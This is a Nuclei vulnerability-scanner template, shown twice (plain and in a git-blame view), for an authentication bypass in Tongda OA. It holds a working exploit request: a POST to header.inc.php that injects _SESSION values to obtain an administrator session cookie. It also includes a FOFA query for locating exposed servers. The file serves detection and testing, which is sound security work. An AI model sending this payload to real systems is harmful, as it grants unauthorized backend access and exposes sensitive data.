nuclei-templates/http/vulnerabilities/tongda/tongdaoa-auth-bypass.yaml

id: tongdaoa-auth-bypass

info:
  name: Tongda OA - Authentication Bypass
  author: SleepingBag945
  severity: high
  description: |
    Tongda OA is an OA system. The old version of header.inc.php has an authentication bypass vulnerability. An attacker can construct a malicious request to access header.inc.php, obtain the cookie, pass identity authentication, log in to the backend, perform related sensitive operations, and cause sensitive information leakage, etc.
  reference:
    - https://github.com/Phuong39/2022-HW-POC/blob/main/%E9%80%9A%E8%BE%BEOA%E7%99%BB%E5%BD%95%E8%AE%A4%E8%AF%81%E7%BB%95%E8%BF%87.md
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-oa-2017-auth-bypass.yaml
  classification:
    cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: tongda2000
    product: office_anywhere
    fofa-query: app="TDXK-通达OA"
  tags: tongda,auth-bypass,misconfig
flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |+
        GET /general/index.php HTTP/1.1
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200 && contains(body,"<title>用户未登录</title>")'

  - raw:
      - |
        POST /module/retrieve_pwd/header.inc.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip

        _SESSION[LOGIN_THEME]=15&_SESSION[LOGIN_USER_ID]=1&_SESSION[LOGIN_UID]=1&_SESSION[LOGIN_FUNC_STR]=1,3,42,643,644,634,4,147,148,7,8,9,10,16,11,130,5,131,132,256,229,182,183,194,637,134,37,135,136,226,253,254,255,536,24,196,105,119,80,96,97,98,114,126,179,607,539,251,127,238,128,85,86,87,88,89,137,138,222,90,91,92,152,93,94,95,118,237,108,109,110,112,51,53,54,153,217,150,239,240,218,219,43,17,18,19,15,36,70,76,77,115,116,185,235,535,59,133,64,257,2,74,12,68,66,67,13,14,40,41,44,75,27,60,61,481,482,483,484,485,486,487,488,489,490,491,492,120,494,495,496,497,498,499,500,501,502,503,505,504,26,506,507,508,515,537,122,123,124,628,125,630,631,632,633,55,514,509,29,28,129,510,511,224,39,512,513,252,230,231,232,629,233,234,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,200,202,201,203,204,205,206,207,208,209,65,187,186,188,189,190,191,606,192,193,221,550,551,73,62,63,34,532,548,640,641,642,549,601,600,602,603,604,46,21,22,227,56,30,31,33,32,605,57,609,103,146,107,197,228,58,538,151,6,534,69,71,72,223,639,225,236,78,178,104,121,149,84,99,100,533,101,113,198,540,626,638,38,&_SESSION[LOGIN_USER_PRIV]=1&_SESSION[LOGIN_USER_PRIV_OTHER]=1&_SESSION[LOGIN_USER_PRIV_TYPE]=1&_SESSION[LOGIN_NOT_VIEW_USER]=0&_SESSION[RETRIEVE_PWD_USER]=1

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200 && contains(header, "Set-Cookie") && contains(header,"PHPSESSID")'
        internal: true

  - raw:
      - |
        GET /general/index.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200 && !contains(body,"<title>用户未登录</title>")  && contains(body,"loginUser")'
# digest: 4b0a00483046022100a31c6a0fdbc2e6ce4aea41be661b17e4eba118bd5e0c4b6e26486ceb707d2872022100cfc75765be458a82074d935d3e900f8709ec7d74d4e27b093dfe8b6e62a10048:922c64590222798bb761d5b6d8e72950
Fix FP -> tongda-arbitrary-login & Rename -> tongdaoa-auth-bypass 2024-09-03 07:53:31 +00:00			`id: tongdaoa-auth-bypass`
Minor - Updates 2023-09-06 19:45:50 +00:00
Added some Templates 2023-08-18 03:22:06 +00:00			`info:`
Fix FP -> tongda-arbitrary-login & Rename -> tongdaoa-auth-bypass 2024-09-03 07:53:31 +00:00			`name: Tongda OA - Authentication Bypass`
Added some Templates 2023-08-18 03:22:06 +00:00			`author: SleepingBag945`
			`severity: high`
Minor - Updates 2023-09-06 19:45:50 +00:00			`description: \|`
			`Tongda OA is an OA system. The old version of header.inc.php has an authentication bypass vulnerability. An attacker can construct a malicious request to access header.inc.php, obtain the cookie, pass identity authentication, log in to the backend, perform related sensitive operations, and cause sensitive information leakage, etc.`
Added some Templates 2023-08-18 03:22:06 +00:00			`reference:`
			`- https://github.com/Phuong39/2022-HW-POC/blob/main/%E9%80%9A%E8%BE%BEOA%E7%99%BB%E5%BD%95%E8%AE%A4%E8%AF%81%E7%BB%95%E8%BF%87.md`
Minor - Updates 2023-09-06 19:45:50 +00:00			`- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-oa-2017-auth-bypass.yaml`
Fix classification Fix classification 2024-09-10 09:08:16 +00:00			`classification:`
			`cpe: cpe:2.3:a:tongda2000:office_anywhere::::::::`
Minor - Updates 2023-09-06 19:45:50 +00:00			`metadata:`
templateman update 2023-10-14 11:27:55 +00:00			`verified: true`
Fix FP -> tongda-arbitrary-login & Rename -> tongdaoa-auth-bypass 2024-09-03 07:53:31 +00:00			`max-request: 3`
Add missing cpes Added missing cpes 2024-09-10 08:22:50 +00:00			`vendor: tongda2000`
Fix classification Fix classification 2024-09-10 09:08:16 +00:00			`product: office_anywhere`
			`fofa-query: app="TDXK-通达OA"`
Fix FP -> tongda-arbitrary-login & Rename -> tongdaoa-auth-bypass 2024-09-03 07:53:31 +00:00			`tags: tongda,auth-bypass,misconfig`
			`flow: http(1) && http(2) && http(3)`
Added some Templates 2023-08-18 03:22:06 +00:00
			`http:`
Update tongdaoa-auth-bypass.yaml 2024-09-03 08:00:04 +00:00			`- raw:`
			`- \|+`
			`GET /general/index.php HTTP/1.1`
			`Host: {{Hostname}}`

			`unsafe: true`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'status_code == 200 && contains(body,"<title>用户未登录</title>")'`

Added some Templates 2023-08-18 03:22:06 +00:00			`- raw:`
			`- \|`
			`POST /module/retrieve_pwd/header.inc.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
			`Accept-Encoding: gzip`

			_SESSION[LOGIN_THEME]=15&_SESSION[LOGIN_USER_ID]=1&_SESSION[LOGIN_UID]=1&_SESSION[LOGIN_FUNC_STR]=1,3,42,643,644,634,4,147,148,7,8,9,10,16,11,130,5,131,132,256,229,182,183,194,637,134,37,135,136,226,253,254,255,536,24,196,105,119,80,96,97,98,114,126,179,607,539,251,127,238,128,85,86,87,88,89,137,138,222,90,91,92,152,93,94,95,118,237,108,109,110,112,51,53,54,153,217,150,239,240,218,219,43,17,18,19,15,36,70,76,77,115,116,185,235,535,59,133,64,257,2,74,12,68,66,67,13,14,40,41,44,75,27,60,61,481,482,483,484,485,486,487,488,489,490,491,492,120,494,495,496,497,498,499,500,501,502,503,505,504,26,506,507,508,515,537,122,123,124,628,125,630,631,632,633,55,514,509,29,28,129,510,511,224,39,512,513,252,230,231,232,629,233,234,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,200,202,201,203,204,205,206,207,208,209,65,187,186,188,189,190,191,606,192,193,221,550,551,73,62,63,34,532,548,640,641,642,549,601,600,602,603,604,46,21,22,227,56,30,31,33,32,605,57,609,103,146,107,197,228,58,538,151,6,534,69,71,72,223,639,225,236,78,178,104,121,149,84,99,100,533,101,113,198,540,626,638,38,&_SESSION[LOGIN_USER_PRIV]=1&_SESSION[LOGIN_USER_PRIV_OTHER]=1&_SESSION[LOGIN_USER_PRIV_TYPE]=1&_SESSION[LOGIN_NOT_VIEW_USER]=0&_SESSION[RETRIEVE_PWD_USER]=1
Fix FP -> tongda-arbitrary-login & Rename -> tongdaoa-auth-bypass 2024-09-03 07:53:31 +00:00
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'status_code == 200 && contains(header, "Set-Cookie") && contains(header,"PHPSESSID")'`
			`internal: true`

			`- raw:`
Added some Templates 2023-08-18 03:22:06 +00:00			`- \|`
			`GET /general/index.php HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
Fix FP -> tongda-arbitrary-login & Rename -> tongdaoa-auth-bypass 2024-09-03 07:53:31 +00:00			`- 'status_code == 200 && !contains(body,"<title>用户未登录</title>") && contains(body,"loginUser")'`
chore: sign templates 🤖 2024-09-12 05:14:01 +00:00			`# digest: 4b0a00483046022100a31c6a0fdbc2e6ce4aea41be661b17e4eba118bd5e0c4b6e26486ceb707d2872022100cfc75765be458a82074d935d3e900f8709ec7d74d4e27b093dfe8b6e62a10048:922c64590222798bb761d5b6d8e72950`